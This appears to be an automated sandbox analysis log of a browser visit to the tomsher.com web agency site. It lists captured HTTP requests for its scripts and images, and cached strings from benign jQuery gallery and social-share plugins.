Source: global trafficHTTP traffic detected: GET /assets/js/bootstrap.bundle.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/isotope.pkgd.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/shopify.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/ScrollTrigger.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/ScrollToPlugin.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/oil-barrel.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/accessability.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/logo.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/web-maintenance.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/noon.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/ScrollSmoother.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/swiper-bundle.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /assets/js/counter.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/clients.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/rlod.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/gsap.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/hybrid.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/header/srv2.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/SplitText.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/google-workspace.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/prestashop.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/chroma.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/mixitup.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/vanilla-tilt.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/youtube.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/images/menu/privacy.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/hero/4/Group%208.svg HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/wow.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/jquery.meanmenu.min.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/hero/4/Group%209.svg HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/main.js HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/12-years.jpg HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/hero/4/Group%207.svg HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu1.webp HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=517=ylu3SfIdsVLC_CHJuNK6_egYjIZZxUDFJ_cj1fT_2BK-RHIkQMCDF3SxlhTWanGSvI-ortHlt71N1ulTaErrJpJMlpAvjXGGiOjIWOV5dBabNo6yHeraOvwQrYHrXF9zX11rdAVXQUu84TjdSC40o0yHl5-pR7W7r68n0V8OnPW4GDi2GjED2FnwMP0
Source: global trafficHTTP traffic detected: GET /assets/imgs/mainbannne.png HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/hero/4/Group%203.svg HTTP/1.1Host: www.tomsher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/service/website_development.png HTTP/1.1Host: www.tomsher.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tomsher.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_1227.2.drString found in binary or memory: <img class="icon-in-menu" width="30" src="https://www.tomsher.com/assets/images/menu/youtube.png" alt="YouTube Video">YouTube Video Marketing</a> equals www.youtube.com (Youtube)
Source: chromecache_1227.2.drString found in binary or memory: <li><a href="https://www.facebook.com/tomsherllc" target="_blank"><span><i class="fa-brands fa-facebook-f"></i></span></a></li> equals www.facebook.com (Facebook)
Source: chromecache_1227.2.drString found in binary or memory: <li><a href="https://www.linkedin.com/company/tomsherllc" target="_blank"><span><i class="fa-brands fa-linkedin"></i></span></a></li> equals www.linkedin.com (Linkedin)
Source: chromecache_1227.2.drString found in binary or memory: "https://www.facebook.com/tomsherllc", equals www.facebook.com (Facebook)
Source: chromecache_1227.2.drString found in binary or memory: "https://www.linkedin.com/company/tomsherllc", equals www.linkedin.com (Linkedin)
Source: chromecache_880.2.drString found in binary or memory: !function(e,o,i,l){"use strict";var a={videoMaxWidth:"855px",youtubePlayerParams:!1,vimeoPlayerParams:!1,dailymotionPlayerParams:!1,videojs:!1},s=function(o){return this.core=e(o).data("lightGallery"),this.$el=e(o),this.core.s=e.extend({},a,this.core.s),this.videoLoaded=!1,this.init(),this};s.prototype.init=function(){var o=this;o.core.$el.on("hasVideo.lg.tm",function(e,i,l,a){if(o.core.$slide.eq(i).find(".lg-video").append(o.loadVideo(l,"lg-object",!0,i,a)),a)if(o.core.s.videojs)try{videojs(o.core.$slide.eq(i).find(".lg-html5").get(0),{},function(){o.videoLoaded||this.play()})}catch(s){console.error("Make sure you have included videojs")}else o.core.$slide.eq(i).find(".lg-html5").get(0).play()}),o.core.$el.on("onAferAppendSlide.lg.tm",function(e,i){o.core.$slide.eq(i).find(".lg-video-cont").css("max-width",o.core.s.videoMaxWidth),o.videoLoaded=!0});var i=function(e){if(e.find(".lg-object").hasClass("lg-has-poster")&&e.find(".lg-object").is(":visible"))if(e.hasClass("lg-has-video")){var i=e.find(".lg-youtube").get(0),l=e.find(".lg-vimeo").get(0),a=e.find(".lg-dailymotion").get(0),s=e.find(".lg-html5").get(0);if(i)i.contentWindow.postMessage('{"event":"command","func":"playVideo","args":""}',"*");else if(l)try{$f(l).api("play")}catch(r){console.error("Make sure you have included froogaloop2 js")}else if(a)a.contentWindow.postMessage("play","*");else if(s)if(o.core.s.videojs)try{videojs(s).play()}catch(r){console.error("Make sure you have included videojs")}else s.play();e.addClass("lg-video-palying")}else{e.addClass("lg-video-palying lg-has-video");var t,d,c=function(i,l){if(e.find(".lg-video").append(o.loadVideo(i,"",!1,o.core.index,l)),l)if(o.core.s.videojs)try{videojs(o.core.$slide.eq(o.core.index).find(".lg-html5").get(0),{},function(){this.play()})}catch(a){console.error("Make sure you have included videojs")}else o.core.$slide.eq(o.core.index).find(".lg-html5").get(0).play()};o.core.s.dynamic?(t=o.core.s.dynamicEl[o.core.index].src,d=o.core.s.dynamicEl[o.core.index].html,c(t,d)):(t=o.core.$items.eq(o.core.index).attr("href")||o.core.$items.eq(o.core.index).attr("data-src"),d=o.core.$items.eq(o.core.index).attr("data-html"),c(t,d));var n=e.find(".lg-object");e.find(".lg-video").append(n),e.find(".lg-video-object").hasClass("lg-html5")||(e.removeClass("lg-complete"),e.find(".lg-video-object").on("load.lg error.lg",function(){e.addClass("lg-complete")}))}};o.core.doCss()&&o.core.$items.length>1&&(o.core.s.enableSwipe&&o.core.isTouch||o.core.s.enableDrag&&!o.core.isTouch)?o.core.$el.on("onSlideClick.lg.tm",function(){var e=o.core.$slide.eq(o.core.index);i(e)}):o.core.$slide.on("click.lg",function(){i(e(this))}),o.core.$el.on("onBeforeSlide.lg.tm",function(e,i,l){var a=o.core.$slide.eq(i),s=a.find(".lg-youtube").get(0),r=a.find(".lg-vimeo").get(0),t=a.find(".lg-dailymotion").get(0),d=a.find(".lg-html5").get(0);if(s)s.contentWindow.postMessage('{"event":"command","func":"pauseVideo","args":""}',"*");else if(r)try{$f(r).api("pause")}catch(c){consol
Source: chromecache_880.2.drString found in binary or memory: !function(t,e){var s=e.document;t.fn.share=function(i){var r={init:function(i){this.share.settings=t.extend({},this.share.defaults,i);var r=(this.share.settings,this.share.settings.networks),o=this.share.settings.theme,a=this.share.settings.orientation,u=this.share.settings.affix,h=this.share.settings.margin,l=this.share.settings.title||t(s).attr("title"),c=this.share.settings.urlToShare||t(location).attr("href"),p="";return t.each(t(s).find('meta[name="description"]'),function(e,s){p=t(s).attr("content")}),this.each(function(){var s,i=t(this),m=i.attr("id"),d=encodeURIComponent(c),f=l.replace("|",""),g=p.substring(0,250);r.forEach(function(e){s=n.networkDefs[e].url,s=s.replace("|u|",d).replace("|t|",f).replace("|d|",g).replace("|140|",f.substring(0,130)),t("<a href='"+s+"' title='Share this page on "+e+"' class='pop share-"+o+" share-"+o+"-"+e+"'></a>").appendTo(i)}),t("#"+m+".share-"+o).css("margin",h),"horizontal"!=a?t("#"+m+" a.share-"+o).css("display","block"):t("#"+m+" a.share-"+o).css("display","inline-block"),"undefined"!=typeof u&&(i.addClass("share-affix"),-1!=u.indexOf("right")?(i.css("left","auto"),i.css("right","0px"),-1!=u.indexOf("center")&&i.css("top","40%")):-1!=u.indexOf("left center")&&i.css("top","40%"),-1!=u.indexOf("bottom")&&(i.css("bottom","0px"),i.css("top","auto"),-1!=u.indexOf("center")&&i.css("left","40%"))),t(".pop").click(function(){return e.open(t(this).attr("href"),"t","toolbar=0,resizable=1,status=0,width=640,height=528"),!1})})}},n={networkDefs:{facebook:{url:"http://www.facebook.com/share.php?u=|u|"},twitter:{url:"https://twitter.com/share?via=in1.com&text=|140|"},linkedin:{url:"http://www.linkedin.com/shareArticle?mini=true&url=|u|&title=|t|&summary=|d|&source=in1.com"},in1:{url:"http://www.in1.com/cast?u=|u|",w:"490",h:"529"},tumblr:{url:"http://www.tumblr.com/share?v=3&u=|u|"},digg:{url:"http://digg.com/submit?url=|u|&title=|t|"},googleplus:{url:"https://plusone.google.com/_/+1/confirm?hl=en&url=|u|"},reddit:{url:"http://reddit.com/submit?url=|u|"},pinterest:{url:"http://pinterest.com/pin/create/button/?url=|u|&media=&description=|d|"},posterous:{url:"http://posterous.com/share?linkto=|u|&title=|t|"},stumbleupon:{url:"http://www.stumbleupon.com/submit?url=|u|&title=|t|"},email:{url:"mailto:?subject=|t|"}}};return r[i]?r[i].apply(this,Array.prototype.slice.call(arguments,1)):"object"!=typeof i&&i?void t.error('Method "'+i+'" does not exist in social plugin'):r.init.apply(this,arguments)},t.fn.share.defaults={networks:["in1","facebook","twitter","linkedin"],theme:"icon",autoShow:!0,margin:"3px",orientation:"horizontal",useIn1:!0},t.fn.share.settings={}}(jQuery,window); equals www.facebook.com (Facebook)
Source: chromecache_880.2.drString found in binary or memory: !function(t,e){var s=e.document;t.fn.share=function(i){var r={init:function(i){this.share.settings=t.extend({},this.share.defaults,i);var r=(this.share.settings,this.share.settings.networks),o=this.share.settings.theme,a=this.share.settings.orientation,u=this.share.settings.affix,h=this.share.settings.margin,l=this.share.settings.title||t(s).attr("title"),c=this.share.settings.urlToShare||t(location).attr("href"),p="";return t.each(t(s).find('meta[name="description"]'),function(e,s){p=t(s).attr("content")}),this.each(function(){var s,i=t(this),m=i.attr("id"),d=encodeURIComponent(c),f=l.replace("|",""),g=p.substring(0,250);r.forEach(function(e){s=n.networkDefs[e].url,s=s.replace("|u|",d).replace("|t|",f).replace("|d|",g).replace("|140|",f.substring(0,130)),t("<a href='"+s+"' title='Share this page on "+e+"' class='pop share-"+o+" share-"+o+"-"+e+"'></a>").appendTo(i)}),t("#"+m+".share-"+o).css("margin",h),"horizontal"!=a?t("#"+m+" a.share-"+o).css("display","block"):t("#"+m+" a.share-"+o).css("display","inline-block"),"undefined"!=typeof 